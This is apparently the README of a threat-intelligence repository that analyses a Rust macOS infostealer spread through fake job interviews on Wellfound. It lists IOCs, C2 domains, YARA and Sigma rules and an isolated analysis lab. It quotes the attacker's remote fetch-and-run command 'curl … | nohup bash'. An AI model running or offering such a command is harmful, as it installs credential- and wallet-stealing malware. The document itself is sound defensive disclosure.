
Análisis estático completo del infostealer de Rust para macOS de HyperHives — 571 valores de configuración descifrados, infraestructura C2, atribución a DPRK/Contagious Interview, reglas YARA/Sigma, paquete STIX 2.1, capa de ATT&CK Navigator
Inteligencia de amenazas: Infostealer universal binario de macOS basado en Rust entregado a través de un falso proceso de entrevista de trabajo en Wellfound (anteriormente AngelList). El operador con el alias "Felix" de "HyperHive" engañó a los objetivos para que ejecutaran un instalador malicioso desde
macos.hyperhives.net. Este repositorio documenta el análisis estático completo: 571 valores de configuración cifrados recuperados, incluyendo URLs C2, un DSN de Sentry y 276 IDs de extensiones de Chrome objetivo.
| SHA-256 de la muestra | 5c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3 |
| Dominio C2 | cloudproxy.link |
| Dominio de entrega | macos.hyperhives.net |
| Plataforma de señuelo | Wellfound (anteriormente AngelList) |
| Persona del operador | "Felix" en "HyperHive" |
| VirusTotal | 9 / 63 detecciones |
| Clasificación | Divulgación pública / paquete de IOCs |
| Última actualización | Abril 2026 |
| Archivo | Formato | Propósito |
|---|---|---|
iocs.txt | Texto plano | Hashes, dominios, URLs, IPs, correo electrónico, IDs de Sentry — pegar en listas de bloqueo, MISP, OpenCTI |
yara_rules.yar | YARA 4.2+ | Coincidencia de hash de muestra conocida + detecciones heurísticas de cadenas para Mach-O |
sigma_rules.yml | Sigma | Reglas de proxy, DNS y creación de procesos — ajusta logsource para tu SIEM |
stix/bundle.json | STIX 2.1 | Paquete CTI legible por máquina con indicadores, SDO de malware, infraestructura, patrones ATT&CK y relaciones |
attack-navigator-layer.json | ATT&CK Navigator | Importar en ATT&CK Navigator para cobertura visual de técnicas |
. ├── README.md # This report ├── iocs.txt # Flat IOC list ├── yara_rules.yar # YARA detection rules ├── sigma_rules.yml # Sigma detection rules ├── stix/ │ └── bundle.json # STIX 2.1 threat-intelligence bundle ├── attack-navigator-layer.json # ATT&CK Navigator layer ├── output/ │ ├── full_decrypted_config.json # Machine-readable decrypted configuration │ ├── iocs.json # Structured IOC export │ ├── c2_protocol.txt # C2 protocol field documentation │ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates) │ ├── source_map.txt # Reconstructed source-file layout │ └── targets.txt # Targeted applications and data paths ├── scripts/ │ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation) │ ├── analyze.py # Static analysis driver │ ├── extract_all.py # String and structure extractor │ ├── r2_analyze.py # Radare2 analysis automation │ ├── r2_targeted.py # Targeted R2 analysis for helpers │ └── validate_repo.py # CI validation script ├── sample/ │ └── README.md # Instructions for sample placement ├── Dockerfile # Analysis container image ├── docker-compose.yml # Air-gapped compose config ├── lab.sh # Helper script for Docker lab ├── SECURITY.md # Safe handling and vulnerability reporting ├── CONTRIBUTING.md # Contribution guidelines ├── CHANGELOG.md # Release history ├── LICENSE # MIT └── .github/ ├── workflows/validate.yml # CI: YARA + Sigma + file checks ├── ISSUE_TEMPLATE/ # Structured issue forms └── PULL_REQUEST_TEMPLATE.md # PR checklist
---
## Inicio rápido
Coloca la muestra como `sample/installer_binary` (consulta [`sample/README.md`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/sample/README.md) para verificar el hash), luego:```bash
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py
El archivo compose impone network_mode: none, read_only: true, y elimina todas las capacidades de Linux. Consulte SECURITY.md para las pautas completas de manejo.
Una oferta de trabajo en Wellfound (anteriormente AngelList) llevó a una cadena de ingeniería social de múltiples correos electrónicos desde una persona operativa "Felix" en "HyperHive". Después de halagar los antecedentes técnicos del objetivo y programar una entrevista falsa, el atacante dirigió a la víctima a "revisar el producto" en hyperhives.net y examinar específicamente Configuración → Diagnóstico → Registro — un pretexto para desencadenar la ejecución de:```
curl -s https://macos.hyperhives.net/install | nohup bash &
La carga útil es un **binario universal Mach-O de 8.5 MB** (x86_64 + arm64) compilado en Rust. El análisis estático con un laboratorio Docker aislado y emulación de CPU de **570 rutinas auxiliares x86_64 únicas** recuperó **todos los 571 valores de configuración cifrados**, exponiendo:
- **C2:** `cloudproxy.link` — cuatro endpoints HTTPS
- **Sentry (pivote de atribución):** DSN completo con ID de org/proyecto en `ingest.de.sentry.io`
- **Identidad de compilación:** Usuario de Cargo `rootr`, nombre en clave `force`, versión `9.12.1`
- **Objetivos:** 276 ID de extensiones de Chrome (billeteras cripto, gestores de contraseñas, credenciales corporativas)
Las tácticas se alinean con las campañas **Contagious Interview vinculadas a RPDC** — reclutamiento falso en plataformas legítimas, construcción de confianza en múltiples pasos, entrega `curl | bash`, ladrón de macOS en Rust y exfiltración centrada en criptomonedas.
---
## 1 — Cómo empezó